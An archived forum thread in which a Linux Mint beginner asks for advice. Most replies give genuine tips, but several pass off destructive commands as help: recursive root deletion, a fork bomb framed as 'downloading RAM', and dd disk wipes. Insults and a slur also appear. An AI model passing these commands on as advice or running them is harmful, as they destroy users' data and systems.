[Boards: 3 / a / aco / adv / an / asp / b / biz / c / cgl / ck / cm / co / d / diy / e / fa / fit / g / gd / gif / h / hc / his / hm / hr / i / ic / int / jp / k / lgbt / lit / m / mlp / mu / n / news / o / out / p / po / pol / qa / r / r9k / s / s4s / sci / soc / sp / t / tg / toy / trash / trv / tv / u / v / vg / vp / vr / w / wg / wsg / wsr / x / y ] [Home]
4chanarchives logo
I just installed my first linux distro (linux mint), any first-timer
Images are sometimes not shown due to bandwidth/network limitations. Refreshing the page usually helps.

You are currently reading a thread in /g/ - Technology

Thread replies: 72
Thread images: 5
File: mint.jpg (6 KB, 300x187) Image search: [Google]
mint.jpg
6 KB, 300x187
I just installed my first linux distro (linux mint), any first-timer advice for linux?
>>
>>55492686
Install Windows 7
>>
Kys
>>
Just a couple of things I guess

Just keep with it and don't be afraid of the terminal, and check out /flt/
>>
Good, now uninstall it and then install gentoo
>>
>>55492686
are you a hobbyist? if yes, linux is for you.
>>
Install arch you noob
>>
>>55492686
press ctrl+alt+t and then type "sudo apt-get update" and then "sudo apt-get upgrade"
>>
File: 1453433856206.gif (2 MB, 360x360) Image search: [Google]
1453433856206.gif
2 MB, 360x360
>>55493238
>not using aptitude
>>
>>55492686
you need ffmpeg and imagemagick.
>>
>>55492686
Nice screenshot. Did you install it on your ipod?
>>
>>55492686
>Mint.
Someone actually choose wisely for once. I'm impressed.

https://www.youtube.com/watch?v=-_IlNbsILLE
>>
>>55493396
I just took it from google, I don't know how to take a screenshot on linux.
>>
>>55492686
Woah how did you manage to do it as a noob? Mint is so difficult to install...
>>
apt-get sucks. Get AntergOS and enjoy the pleasure of being pacmanned inside
>>
File: 1442767132884.gif (2 MB, 200x150) Image search: [Google]
1442767132884.gif
2 MB, 200x150
>>55493581
>>
open terminal, then put : rm -rf /
>>
I would suggest that you try out dolphin file manager.
I know you already have a file manager, but install it, press f4 and you have an embedded terminal.
It is a very good gateway to using the terminal more.
The majority of the CLI applications you will use is related to files, so it makes a lot of sense.
>>
>>55493537
linux mint press prt scn button.
press crtl alt shift r to start and stop screen record.
>>
>>55493950
*cinnamon mint, not linux mint.
>>
Uninstall
>>
I just installed Debian, lets see if I can get wine working. The terminal is the same as the console/shell it seems.
>>
>>55493673
wew lad i can barely contain my sides on that original one
>>
Before you run any command, especially with sudo you should do
man <command>
. It tells you what the command and its options does.

Aliases are very useful. Instead of typing a lot of text you can just type a word. Instead of doing >>55493238 you can just create an alias, for example
alias upgrade='sudo apt-get update && sudo apt-get upgrade'
. Now just write
upgrade
in the terminal and it'll do
sudo apt-get update
and
sudo apt-get upgrade
.

Aliases are store in ~/.bashrc (~/ is same as /home/<username>). If you add this to .bashrc you can store your aliases in a separate file called .bash_aliases instead.
if [ -f ~/.bash_aliases ]; then
. ~/.bash_aliases
fi
>>
>>55493673
Thats the one that deletes everything starting from root I believe, there's also one that "bombs" everything, whatever that means.
>>
>>55492686
Open up a terminal and type this in it:
sudo rm -rf / --no-preserve-root
>>
>>55494168
Oh... Should probably add that any file or folder that starts with a dot (.) is hidden so you need to enable viewing hidden files in your file manager.
>>
>>55492686
keep an open mind
while it mostly jestwerx, if you expect it to be exactly like windows you're gonna have some minor frustrations, and the minor things are more annoying than the major things
>>
>>55494196
Personally, this is the best. Not even a considerable price of freedom. Just going to have to learn.
>>
File: barack-obama-yes-we-can.jpg (61 KB, 436x432) Image search: [Google]
barack-obama-yes-we-can.jpg
61 KB, 436x432
Type
yes we can
in terminal
>>
So I need to set up a multiarch for wine, I'm amd64, and the command is # dpkg --add-architecture i386 && apt update. When I enter that in I don't get a response in the terminal, presumably it worked. Just to see I entered the command again without the hashtag and since I'm not in root it said access denied. Has multiarch been enabled or do I sudo the command. Presumably it has been enabled.
>>
>>55494191
Just type C-r to do a reverse search through history in bash. Aliases aren't necessary in most cases.
I type
 C-r y u <RET> 
to do a full upgrade of my system.
>>
>>55492686

First things first, use it extensively for 1-2 weeks
Don't boot into windows. This will make your switch to GNU/Linux less painful later on

You also should get to use the terminal and learn how to use bash
Don't be afraid to look up tutorials on YouTube to learn about GNU/Linux
Press Ctrl Alt T to open a terminal. (Should be default)

You might want to install wine too
This allows you to execute windows exe files
Run this command to install:
sudo dpkg --add-architecture i386 && sudo add-apt-repository ppa:wine/wine-builds && sudo apt-get update && sudo apt-get install --install-recommends winehq-devel

But before you go wild and install wine consider alternatives

Also see >>55493238 >>55494168 >>55494191 >>55494196
And ask /fglt/ if you have problems
>>
install windows in a VM. Don't uninstall "Video", it delets VLC too.
t. uses linux since 3 days and is stupid and lazy
>>
All these text commands for simple shit...Jesus fucking Christ.
>>
>>55494815
If you learn them it's way easier then going to a website to download a program
>>
>>55492686
Advice? Get rid of it as soon as possible. Devs are incompetent. It's so shitty, it even needs to block updates so it doesn't fall apart. https://github.com/linuxmint/mintupdate/blob/master/usr/lib/linuxmint/mintUpdate/rules Even the webdevs aren't competent and the website was hacked and people downloaded backdoored .iso images. http://www.techrepublic.com/article/why-the-linux-mint-hack-is-an-indicator-of-a-larger-problem/ Everything what Mint is, is a bad Ubuntu with preconfigured Cinnamon as DE. There's no reason to use it. Get a better distro.

And don't feel sad. Many newcomers fell for Linux Mint.
>>
>>55494758
wat
>>
switch to the dark theme, your eyes will thank you
>>
>>55492686
Remove cinnamon && install i3wm.
>>
>>55495329
This
>>
>>55495329
0/10, trying way too hard
>>
>>55494176
What you're thinking of is dd if=/dev/sda of=/dev/zero .
This overwrites all information on the disk with zeros, while rm -rf only marks the data as free space to be overwritten.
>>
>>55493601
everyone says this but I never noticed a difference
>>
>>55495572
its
dd if=/dev/null of=/dev/sdXX
>>
>>55495596
Oops, you're right. It's muscle memory for me to zero out a drive, but my phone keyboard is absolute shit.
>>
>>55495572
That does nothing.

if = input
of = output

You'd simply be piping the content of sda into a hole.
>>
Type this into a terminal:
:(){ :|: & };:

It will speed up your system by downloading more ram from Ubuntu's servers.
>>
>>55495645
See
$ man dd
>>
>>55492686
Ditch Mint and get Kubuntu.
>>
>>55495645
>if=input file
>minor brain aneurism
>"Of course if is the output"
>make post
>instant regret
>>
>>55493435
What? Everyone chooses mint as their first distro until it's time to move on
>>
>>55493086
Nobody wants to hear that faggotry.
>>
>>55494179

die in hell
>>
>>55492686

do frequent back ups. i do it with clonezilla, choose a method you prefer
>>
>>55495652
"Downloading RAM" its actually possible now thanks to the R480, thanks based AMD.
>>
Did you check sig key?
you could have downloaded botnet
>>
>>55492686
sudo apt-get update fixes majority of the problems
>>
>>55492686
Advice: don't listen to the idiots who tell you to install something else. If you get bored and you want to do that, fine. If it works for you, fuck them; keep what you've got. This coming from an unabashed Arch shill.
>>
>>55494976
Dude if those are you're only options...just my God...
>>
>>55492686
>>55492856
>>55493086
Install FreeBSD.
>>
>>55492686
Google begging mage to Unix PDF (like 100 pages).
>>
>>55492686
why are you using that crap of distribution, go back to windows or install something real like arch.
>>
>>55498045
mint is a malware by itself.
>>
File: 1435039491591.jpg (38 KB, 386x508) Image search: [Google]
1435039491591.jpg
38 KB, 386x508
/G/entoomen, like OP I am contemplating turning my Chinkpad into a full time GNU + Linux machine. Is Xubuntu a good option?
>>
>>55500602
Yes, so is Ubuntu Mate
>>
>>55500602
Yes
>>
>>55500655
>>55500665
No memes, I'm grateful. Is there anything I need to know as a first time user?
>>
>>55500677
yes, there are things you should know
>>
>>55500677
No, just try them out and see how you go.
>>
>>55500701
Like?
>>
>>55501484
Wrong thread retard
Thread replies: 72
Thread images: 5

banner
banner
[Boards: 3 / a / aco / adv / an / asp / b / biz / c / cgl / ck / cm / co / d / diy / e / fa / fit / g / gd / gif / h / hc / his / hm / hr / i / ic / int / jp / k / lgbt / lit / m / mlp / mu / n / news / o / out / p / po / pol / qa / r / r9k / s / s4s / sci / soc / sp / t / tg / toy / trash / trv / tv / u / v / vg / vp / vr / w / wg / wsg / wsr / x / y] [Home]

All trademarks and copyrights on this page are owned by their respective parties. Images uploaded are the responsibility of the Poster. Comments are owned by the Poster.
If a post contains personal/copyrighted/illegal content you can contact me at [email protected] with that post and thread number and it will be removed as soon as possible.
DMCA Content Takedown via dmca.com
All images are hosted on imgur.com, send takedown notices to them.
This is a 4chan archive - all of the content originated from them. If you need IP information for a Poster - you need to contact them. This website shows only archived content.